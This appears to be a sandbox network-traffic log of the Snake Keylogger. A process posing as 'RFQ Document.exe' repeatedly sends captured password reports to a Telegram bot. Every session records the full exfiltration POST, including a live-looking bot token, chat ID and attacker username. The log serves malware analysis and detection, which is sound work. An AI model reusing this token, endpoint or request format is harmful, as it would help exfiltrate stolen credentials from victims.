2021-09-28 05:58:22 UTC	14	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:22 GMT Content-Type: application/json Content-Length: 519 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:22 UTC	15	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12588,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.4	49866	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:40 UTC	144	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cda53fd6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:40 UTC	144	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 61 35 33 66 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cda53fd6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:40 UTC	144	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:40 UTC	145	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12673,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.4	49867	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:40 UTC	145	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cdc43fba Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:40 UTC	146	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 63 34 33 66 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cdc43fbaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:40 UTC	146	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:40 UTC	146	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12674,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.4	49868	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:40 UTC	147	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cddc15cc Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:40 UTC	147	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 64 63 31 35 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cddc15ccContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:40 UTC	148	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:40 UTC	148	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12675,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.4	49869	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:41 UTC	148	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cdf18b5f Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:41 UTC	149	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 66 31 38 62 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cdf18b5fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:41 UTC	149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:41 UTC	150	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12676,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.4	49870	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:41 UTC	150	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ce12ebba Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:41 UTC	150	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 31 32 65 62 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ce12ebbaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:41 UTC	151	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:41 UTC	151	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12677,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.4	49871	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:41 UTC	152	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ce55ad92 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:41 UTC	152	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 35 35 61 64 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ce55ad92Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:41 UTC	152	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:41 UTC	153	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12678,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808721,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.4	49872	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:41 UTC	153	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ce6b24c9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:41 UTC	154	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 36 62 32 34 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ce6b24c9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:41 UTC	154	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:41 UTC	154	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 31 2c 22 64 Data Ascii: 